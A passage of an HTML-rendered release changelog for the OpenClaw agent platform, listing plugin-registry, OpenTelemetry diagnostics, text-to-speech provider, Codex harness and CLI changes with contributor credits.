<li>CLI/Crestodian/TUI: add the first-run setup helper, local planner fallback, full-TUI interactive Crestodian, startup progress indicators, context mode selector, and a shorter startup greeting. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329002099" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71720" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71720/hovercard" href="https://github.com/openclaw/openclaw/pull/71720">#71720</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329176612" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71760" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71760/hovercard" href="https://github.com/openclaw/openclaw/pull/71760">#71760</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/SebTardif/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/SebTardif">@SebTardif</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kevinlin-openai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kevinlin-openai">@kevinlin-openai</a>.</li>
<li>Plugins: migrate the local plugin registry automatically during package install/update, keeping install metadata in the plugin index while indexing existing plugin manifests for the new cold registry path. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Plugins/doctor: make <code>openclaw doctor --fix</code> refresh the plugin index and cold registry index when needed without treating plugin install records as authored config. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Plugins/hooks: add before-agent-finalize hooks, cron <code>jobId</code> hook context, bounded native permission fingerprints, and Codex MCP hook relay support. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329196089" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71765" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71765/hovercard" href="https://github.com/openclaw/openclaw/pull/71765">#71765</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329172189" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71758" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71758/hovercard" href="https://github.com/openclaw/openclaw/pull/71758">#71758</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4328919273" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71707" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71707/hovercard" href="https://github.com/openclaw/openclaw/pull/71707">#71707</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pashpashpash/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pashpashpash">@pashpashpash</a>.</li>
<li>Plugins/tokenjuice: bump the bundled tokenjuice runtime to 0.6.3. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Diagnostics/OTEL: align model-call GenAI span attributes with OpenTelemetry stability opt-in semantics, keeping legacy <code>gen_ai.system</code> by default while emitting <code>gen_ai.provider.name</code> under <code>OTEL_SEMCONV_STABILITY_OPT_IN=gen_ai_latest_experimental</code>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Diagnostics/OTEL: support signal-specific OTLP endpoint overrides for traces, metrics, and logs via config or standard OTEL environment variables. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Diagnostics/OTEL: emit bounded telemetry exporter health diagnostics for startup and log-export failures without exporting raw error text. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Diagnostics/OTEL: export agent harness lifecycle telemetry as bounded <code>openclaw.harness.run</code> spans and <code>openclaw.harness.duration_ms</code> metrics so QA-lab, Codex, and future harnesses share one trace shape. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Diagnostics/trace: propagate W3C <code>traceparent</code> headers from trusted model-call trace context to provider transports while replacing caller-supplied traceparent values. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Diagnostics/Prometheus: add a bundled <code>diagnostics-prometheus</code> plugin with a protected gateway scrape route for low-cardinality diagnostics metrics. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/CLI: add <code>openclaw plugins registry</code> for explicit persisted-registry inspection and <code>--refresh</code> repair without making normal startup rescan plugin locations. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/CLI: make <code>openclaw plugins list</code> read the cold persisted registry snapshot by default, leaving module-aware diagnostics to <code>plugins doctor</code> and <code>plugins inspect</code>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/startup: move gateway startup plugin planning onto the versioned cold registry index, with postinstall repair for older registry files that predate startup metadata. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/startup: normalize startup and provider plugin enablement through registry aliases so boot paths do not need the legacy manifest alias scan. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Providers/plugins: resolve provider ownership, provider discovery scopes, and catalog-hook provider ids from the cold plugin registry instead of rescanning manifests on those paths. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/registry: keep installed plugin index records focused on install/state/load paths and resolve plugin capabilities from manifests scoped to indexed plugins. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Plugins/registry: route cold manifest and capability lookups through the installed plugin index so setup, channels, config, secrets, doctor, and provider metadata paths avoid broad plugin-root scans before runtime execution. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>CLI/models: speed up <code>models list --all --provider &lt;id&gt;</code> for static manifest-backed providers by loading catalog rows through the installed plugin index instead of broad manifest scans or runtime suppression hooks. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>CLI/models: use OpenClaw Provider Index preview rows as the final cold fallback for installable providers, while keeping user config, installed manifests, and refreshed cache rows above provider-index metadata. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Providers/plugins: keep onboarding and auth-choice setup lists on cold manifest/install metadata and add Provider Index install metadata for not-yet-installed provider plugins. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Providers/plugins: keep provider setup guidance and configure auth imports on cold manifest metadata, with a regression guard against static provider-runtime imports on setup/configure list paths. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>CLI/capabilities: keep capability command registration from importing the models auth runtime until <code>model auth login</code> actually runs. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>CLI/configure: keep web-search configure prompts on cold plugin registry metadata until the user chooses managed search setup. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/chat commands: refresh the persisted plugin registry after <code>/plugins enable</code> and <code>/plugins disable</code>, matching the CLI mutation path. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/compat: mark <code>OPENCLAW_DISABLE_PERSISTED_PLUGIN_REGISTRY</code> as a deprecated break-glass switch and point operators at registry repair instead. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/compat: expand the central compatibility registry with dated owners, replacements, and maximum three-month removal targets for legacy SDK, manifest, setup, registry-migration, and agent-runtime surfaces. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/registry: ignore stale persisted registry reads when plugin policy no longer matches current config, and stamp generated registry files with a do-not-edit warning. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Config/plugins: keep plugin command-alias validation on cold manifest metadata instead of importing the runtime alias resolver. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Security/plugins: keep web-search credential presence checks on cold config, env, and manifest metadata instead of importing web-search provider runtime. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Diagnostics/OTEL: surface provider request identifiers as bounded hashes on model-call diagnostics and span events, without exporting raw request IDs or metric labels. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Lidang-Jiang/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Lidang-Jiang">@Lidang-Jiang</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/diagnostics: add metadata-only <code>model_call_started</code> and <code>model_call_ended</code> hooks for provider/model call telemetry without exposing prompts, responses, headers, request bodies, or raw provider request IDs. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Diagnostics/OTEL: emit bounded context assembly diagnostics and export <code>openclaw.context.assembled</code> spans with prompt/history sizes but no prompt, history, response, or session-key content. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Diagnostics/OTEL: export existing tool-loop diagnostics as <code>openclaw.tool.loop</code> counters and spans without loop messages, session identifiers, params, or tool output. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Diagnostics/OTEL: export diagnostic memory samples and pressure as bounded memory histograms, counters, and pressure spans to help spot leak regressions without session or payload data. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Diagnostics/OTEL: add the GenAI <code>gen_ai.client.token.usage</code> histogram for input/output model usage while keeping session identifiers and aggregate cache counters out of the semantic metric. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Diagnostics/OTEL: add a bounded <code>openclaw.agent</code> label to OpenClaw token metrics so per-agent Grafana dashboards can group usage without exporting session identifiers. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/oc-factus/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/oc-factus">@oc-factus</a>.</li>
<li>Plugins/install: consolidate managed plugin install metadata into the state-managed plugin index at <code>plugins/installs.json</code>, replacing the temporary <code>plugins/installed-index.json</code> path and removing <code>plugins.installs</code> as an authored config surface. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Diagnostics/OTEL: add the GenAI <code>gen_ai.client.operation.duration</code> histogram for model-call latency in seconds with bounded provider/model/API and error attributes. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Diagnostics/OTEL: add GenAI usage token attributes to model-usage spans, including cache read/write input token counts without session identifiers or prompt/response content. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Diagnostics/OTEL: include bounded GenAI operation, provider, and request-model attributes on model-usage spans so token usage remains self-describing without diagnostic identifiers. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Diagnostics/OTEL: keep model-usage span GenAI provider attributes aligned with the existing semantic-convention opt-in policy, using legacy <code>gen_ai.system</code> unless latest experimental GenAI conventions are enabled. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Diagnostics/OTEL: keep <code>gen_ai.request.model</code> present on GenAI token usage metrics with a bounded <code>unknown</code> fallback when model usage events do not include a model. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Docs/OTEL: document the GenAI token and model-call duration metrics, model-usage span attributes, and <code>OTEL_SEMCONV_STABILITY_OPT_IN=gen_ai_latest_experimental</code> provider-attribute behavior. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Docs: refresh the MCP, model provider, doctor, troubleshooting, BlueBubbles, media generation, TTS, subagents, skills, cron/tasks, exec approvals, and voice-call guides with structured Steps, Tabs, and Accordion content.</li>
<li>Diagnostics/trace: add an internal traceparent propagation helper that only formats trusted dispatcher metadata, keeping plugin-emitted diagnostic traces out of outbound propagation by default. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Diagnostics/OTEL: add bounded outbound message delivery lifecycle diagnostics and export them as low-cardinality delivery spans/metrics without message body, recipient, room, or media-path data. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4327526859" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71471" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71471/hovercard" href="https://github.com/openclaw/openclaw/pull/71471">#71471</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jlapenna/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jlapenna">@jlapenna</a>.</li>
<li>Diagnostics/OTEL: emit bounded exec-process diagnostics and export them as <code>openclaw.exec</code> spans without exposing command text, working directories, or container identifiers. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4327444687" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71451" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71451/hovercard" href="https://github.com/openclaw/openclaw/pull/71451">#71451</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jlapenna/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jlapenna">@jlapenna</a>.</li>
<li>Diagnostics/OTEL: support <code>OPENCLAW_OTEL_PRELOADED=1</code> so the plugin can reuse an already-registered OpenTelemetry SDK while keeping OpenClaw diagnostic listeners wired. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4327404376" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71450" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71450/hovercard" href="https://github.com/openclaw/openclaw/pull/71450">#71450</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jlapenna/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jlapenna">@jlapenna</a>.</li>
<li>Providers/Xiaomi: add MiMo TTS as a bundled speech provider with MP3/WAV output and voice-note Opus transcoding. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4116510361" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/52376" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/52376/hovercard" href="https://github.com/openclaw/openclaw/issues/52376">#52376</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4149888425" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/55614" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/55614/hovercard" href="https://github.com/openclaw/openclaw/pull/55614">#55614</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zoujiejun/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zoujiejun">@zoujiejun</a>.</li>
<li>Providers/ElevenLabs: include <code>eleven_v3</code> in the bundled TTS model catalog so model selection surfaces can offer ElevenLabs v3. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4285755724" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68321" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/68321/hovercard" href="https://github.com/openclaw/openclaw/pull/68321">#68321</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/itsuzef/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/itsuzef">@itsuzef</a>.</li>
<li>Providers/Local CLI TTS: add a bundled local command speech provider with file/stdout input, voice-note Opus conversion, and telephony PCM output. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4158165001" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/56239" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/56239/hovercard" href="https://github.com/openclaw/openclaw/pull/56239">#56239</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/solar2ain/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/solar2ain">@solar2ain</a>.</li>
<li>Providers/Inworld: add Inworld as a bundled speech provider with streaming TTS synthesis, voice listing, voice-note output, and PCM telephony output. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4155025815" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/55972" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/55972/hovercard" href="https://github.com/openclaw/openclaw/pull/55972">#55972</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/cshape/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/cshape">@cshape</a>.</li>
<li>Providers/Volcengine: add Volcengine/BytePlus Seed Speech as a bundled TTS provider with API-key auth, native Ogg/Opus voice-note output, and MP3 audio-file output. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4150318584" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/55641" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/55641/hovercard" href="https://github.com/openclaw/openclaw/pull/55641">#55641</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/xuruiray/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/xuruiray">@xuruiray</a>.</li>
<li>Android/Talk Mode: expose Talk Mode in the Voice tab with runtime-owned voice capture modes and microphone foreground-service escalation. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/alex-latitude/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/alex-latitude">@alex-latitude</a>.</li>
<li>Providers/LiteLLM: register <code>litellm</code> as an image-generation provider so <code>image_generate model=litellm/...</code> calls and <code>agents.defaults.imageGenerationModel.fallbacks</code> entries resolve through the LiteLLM proxy. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zqchris/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zqchris">@zqchris</a>.</li>
<li>Providers/fal: add Seedance 2.0 reference-to-video models with multi-image, video, and audio reference input mapping plus model-specific capability limits for <code>video_generate</code>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shivanker/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shivanker">@shivanker</a>.</li>
<li>Codex harness: require Codex app-server <code>0.125.0</code> or newer and cover native MCP <code>PreToolUse</code>, <code>PostToolUse</code>, and <code>PermissionRequest</code> payloads through the OpenClaw hook relay.</li>
<li>Agents/Codex: teach prompts and <code>agents_list</code> to surface native Codex app-server availability so agents prefer <code>/codex ...</code> over Codex ACP unless ACP/acpx is explicit. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>ACPX/Droid: add Factory Droid to the live ACP bind Docker matrix, including <code>.factory</code> settings staging, <code>FACTORY_API_KEY</code> forwarding, and the single-agent <code>test:docker:live-acp-bind:droid</code> recipe.</li>
<li>TTS/personas: add provider-aware TTS personas with deterministic provider binding merges, <code>/tts persona</code> controls, gateway/CLI persona state, Google Gemini <code>audio-profile-v1</code> prompt wrapping, and OpenAI instruction mapping. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4318374088" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70748" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70748/hovercard" href="https://github.com/openclaw/openclaw/pull/70748">#70748</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/barronlroth/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/barronlroth">@barronlroth</a>.</li>
<li>Voice Wake: add trigger-based routing so macOS voice wake phrases can select a configured agent or session target, with Gateway routing APIs and node update events. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4006394318" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/30354" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/30354/hovercard" href="https://github.com/openclaw/openclaw/pull/30354">#30354</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/longbiaochen/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/longbiaochen">@longbiaochen</a>.</li>
</ul>
<h3>Fixes</h3>
<ul>
<li>Plugins/startup: load the default <code>memory-core</code> slot during Gateway startup when permitted so active-memory recall can call <code>memory_search</code> and <code>memory_get</code> without requiring an explicit <code>plugins.slots.memory</code> entry, while preserving <code>plugins.slots.memory: "none"</code>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/codex/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/codex">@codex</a>.</li>
<li>Plugins/CLI: prefer native require for compiled bundled plugin JavaScript before jiti so read-only config, status, device, and node commands avoid unnecessary transform overhead on slow hosts. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4221630999" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/62842" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/62842/hovercard" href="https://github.com/openclaw/openclaw/issues/62842">#62842</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Effet/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Effet">@Effet</a>.</li>
